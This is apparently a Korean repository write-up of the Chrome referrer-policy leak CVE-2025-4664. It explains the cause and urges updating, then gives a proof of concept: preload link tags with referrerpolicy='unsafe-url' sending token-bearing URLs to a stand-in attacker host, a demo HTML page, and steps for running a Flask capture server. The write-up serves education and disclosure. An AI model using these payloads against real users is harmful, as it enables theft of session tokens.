
CVE-2025-4664 취약점은 Google Chrome 136.0.7103.113 이전 버전의 Loader 구성 요소에서 확인된 심각도가 높은 보안 결함입니다. 이 문제로 인해 원격 공격자는 특수하게 제작된 HTML 페이지를 통해 교차 출처(cross-origin) 데이터를 유출할 수 있으며, 세션 토큰이나 인증 자격 증명과 같은 민감한 정보가 손상될 수 있습니다.
이 결함은 Chrome의 Loader 구성 요소에서 보안 정책이 부적절하게 구현된 데서 비롯됩니다. 구체적으로 Chrome은 다른 브라우저에서는 적용되지 않는 상황에서도 하위 리소스(이미지 또는 스크립트 등) 요청 시 HTTP Link 헤더의 referrer-policy 지시문을 해석합니다. 공격자는 unsafe-url과 같이 덜 제한적인 정책을 설정하여 이 점을 악용할 수 있으며, 이로 인해 Chrome은 민감한 매개변수를 포함한 전체 URL을 공격자가 제어하는 도메인으로 유출하게 됩니다.
이 취약점은 실제 환경에서 활발히 악용되었으며, 이로 인해 미국 사이버보안 및 인프라 보안국(CISA)이 이를 KEV(알려지고 악용된 취약점 카탈로그)에 포함시켰습니다. CISA는 연방 기관이 해당 수정 사항을 적용해야 하는 기한을 2025년 6월 5일로 설정했습니다.
Google은 이 취약점을 수정하는 업데이트를 다음 버전으로 출시했습니다:
모든 사용자는 Chrome 브라우저를 사용 가능한 최신 버전으로 업데이트할 것을 강력히 권장합니다. 업데이트를 확인하고 적용하려면:
또한 Microsoft Edge, Brave, Opera, Vivaldi와 같은 Chromium 기반 브라우저 사용자도 이 취약점의 영향을 받을 수 있으므로 해당 업데이트에 주의를 기울여야 합니다.
브라우저를 최신 상태로 유지하는 것은 활발한 보안 위협으로부터 보호하고 개인 정보를 안전하게 지키는 데 필수적입니다.
CVE-2025-4664 취약점은 Google Chrome이 HTML 링크에서 하위 리소스(이미지, 스크립트 등)를 로드할 때 참조 정책(referrer-policy)을 처리하는 방식을 조작하여 악용됩니다.
🌐 악성 사이트 생성:
공격자는 HTTP 헤더에 다음과 같은 HTML 링크를 포함하는 웹사이트를 만듭니다:
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 referrer-policy 조작: 대부분의 브라우저에서는 태그의 이 referrerpolicy가 로드된 리소스에 적용되지 않습니다. 그러나 Chrome은 이를 적용하며, 이것이 문제의 핵심입니다.
📤 Referer 유출: 피해자(Chrome)의 브라우저가 victima.com에서 리소스를 로드할 때 출처 사이트의 전체 URL을 Referer 헤더로 전송하며, 여기에는 다음이 포함될 수 있습니다:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
피해자가 이 리소스에 접근하면 Chrome은 전체 URL을 Referer로 공격자 서버에 전송합니다.
1- 공격자가 피해자에게 다음 링크를 보냅니다:
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
공격자 도메인으로, 토큰이 노출됩니다.

index.html — 피해자 파일이 파일은 공격의 피해자를 시뮬레이션하며, 악성 태그를 사용하여 CVE-2025-4664 취약점을 악용하는 방법을 보여주는 단순화된 HTML 데모입니다:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
<p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>
servidor_atacante.py — 공격자 파일이 스크립트를 사용하면 Python 기반 소형 서버를 통해 Referer를 캡처하는 공격을 자동화할 수 있습니다. 다음은 데이터를 수신하는 공격자 서버를 시뮬레이션하기 위해 Flask를 사용한 예시입니다:
index.html로 표현된 피해자에 대한 공격을 시뮬레이션합니다.pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
스크립트를 실행하는 서버의 공인 IP 또는 로컬 IP로 <tu_IP>를 바꾸세요.
터미널(PowerShell 또는 CMD)을 엽니다.
파일이 있는 폴더로 이동합니다:
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
같은 폴더(C:\Users\Sebas\Desktop\servidor_atacante)에 다음 내용으로 index.html이라는 파일을 만듭니다:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Simula el ataque -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Simulación CVE-2025-4664</h1>
<p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>
✅ 중요: IP(192.168.1.35)가 Flask가 로컬 IP로 표시하는 주소와 일치하는지 확인하세요. 다르다면 HTML에서 변경하세요.
Chrome을 엽니다.
주소 표시줄에 다음을 입력합니다:
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
Enter 키를 누릅니다.
📥 서버에서 결과 확인하기 Flask 콘솔에서 다음과 같은 내용이 표시되어야 합니다:
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
[Carpeta destino]: 파일이 저장된 위치에 따라 이 매개변수를 수정하세요.
🎯 브라우저가 전체 Referer를 공격자에게 전송했다는 뜻입니다!
공격적 사이버보안에 대한 교육 및 연구 목적으로 Sebastian Peinador가 작성한 설명입니다.
이 자료는 MIT 라이선스에 따라 배포됩니다.
유용하게 여겨지신다면, ⭐를 눌러 리포지토리를 응원하거나 공유하는 것을 잊지 마세요!